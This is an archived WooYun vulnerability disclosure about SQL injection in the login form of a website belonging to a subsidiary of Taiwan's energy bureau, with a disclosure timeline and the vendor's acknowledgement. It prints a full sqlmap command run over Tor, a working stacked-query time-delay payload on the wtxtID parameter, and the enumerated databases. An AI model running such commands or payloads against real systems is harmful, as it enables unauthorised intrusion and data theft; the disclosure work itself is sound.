乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-28: 细节已通知厂商并且等待厂商处理中 2015-12-30: 厂商已经确认,细节仅向厂商公开 2016-01-09: 细节向核心白帽子及相关领域专家公开 2016-01-19: 细节向普通白帽子公开 2016-01-29: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
台湾能源局某下属网站SQL注入
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N --answers="extending=N,skip=Y,follow=N,quite=Y" -u "http://**.**.**.**/ecem_asso/" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFgYCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kZALxmJ1YEFq4ivnUluJI1nUJrL75d3qwcYqyZscxDHIp&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=%2FwEdAB8kaUtvws8kuBYkiJrbC%2BesFq29negq3mFOYTR8%2BP4sFTjhKKHG2qB%2BY3b%2F8oYsoWLtp%2Fq7o0m9FwzaEv5l1JtJK040%2FqUXLXKzoT80wjcF9Y3u%2BAJmPgphVLZT7HLCdIm3Ksf7tj7DvOUdnd6fBQQC45Tl%2BiojsHBTvMKGfsKZsJEKG5y%2BAFtkZSp%2B3QCkDest7MC%2FTgmrTYIipoRtPxxtB%2F4uQrMGpJash3cgN6yZBp1dKqBCNHLdsimx%2Bz7g74ytqCtQuD01aSHJ%2Fnxvzwf7a576RE1p6cVH%2FWXAQGs2jxYvD7Qn6Ja1%2BdHEwjrcqgqNERGAi%2BNI%2FwTj0aYXsMUu4mgoVbgFFQNR%2BpKoDk16hNoxF%2BBihsROkNr5LB5sSR6LBAa0ngbr5fex4dUdMmhbJ%2FgdCCW%2B7DJkGNELFCvkSzF4AOndOF2NDl10RA2Prpm1Y%2FefEHqaqawbtB4Tpo9%2FLkqBTcsvJUaHreQ7YGYdY4QOPrM%2BVVhYPNmth5fVm3BQqdjCf%2BVXNT%2FEZ48lxSYemnUahPp24FK6dtoPMNqk6omAuZEtt0CFpueXC6bs4UaEqfUo8mOBjC3EOJUIh8fZvEfHoYPOiZ9lKvSuy0LNaPxOv8PS1Ci7hkfQYwhz%2B50cJKkGLgf49a0tat20Lfpof9vGMsSB3IwqFbCofXtH3hcP0QEONvxTat9Ca67s5YQ%3D&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1" --dbs---Parameter: wtxtID (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFggCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kAhEPDxYEHgRUZXh0BSfluLPomZ/miJblr4bnorzmnInoqqQs6KuL6YeN5paw6Ly45YWlISEfAGdkZGRMdKi5vKHKmaBvWMuidPzU0GBkoX583TjOQDdomZjKdw==&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=/wEdAB/X6LULhkFGnnlXS7C//6DkFq29negq3mFOYTR8+P4sFTjhKKHG2qB+Y3b/8oYsoWLtp/q7o0m9FwzaEv5l1JtJK040/qUXLXKzoT80wjcF9Y3u+AJmPgphVLZT7HLCdIm3Ksf7tj7DvOUdnd6fBQQC45Tl+iojsHBTvMKGfsKZsJEKG5y+AFtkZSp+3QCkDest7MC/TgmrTYIipoRtPxxtB/4uQrMGpJash3cgN6yZBp1dKqBCNHLdsimx+z7g74ytqCtQuD01aSHJ/nxvzwf7a576RE1p6cVH/WXAQGs2jxYvD7Qn6Ja1+dHEwjrcqgqNERGAi+NI/wTj0aYXsMUu4mgoVbgFFQNR+pKoDk16hNoxF+BihsROkNr5LB5sSR6LBAa0ngbr5fex4dUdMmhbJ/gdCCW+7DJkGNELFCvkSzF4AOndOF2NDl10RA2Prpm1Y/efEHqaqawbtB4Tpo9/LkqBTcsvJUaHreQ7YGYdY4QOPrM+VVhYPNmth5fVm3BQqdjCf+VXNT/EZ48lxSYemnUahPp24FK6dtoPMNqk6omAuZEtt0CFpueXC6bs4UaEqfUo8mOBjC3EOJUIh8fZvEfHoYPOiZ9lKvSuy0LNaPxOv8PS1Ci7hkfQYwhz+50cJKkGLgf49a0tat20Lfpolal2RxYlI0PC5UNVhyyEyJ7oSroYnTAh+hHc80EK9dI=&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111';WAITFOR DELAY '0:0:20'--&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1---web server operating system: Windows 8.1 or 2012 R2web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5back-end DBMS: Microsoft SQL Server 2012available databases [6]:[*] EBDB[*] master[*] model[*] msdb[*] OGDB[*] tempdb
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-30 17:48
感謝通報
暂无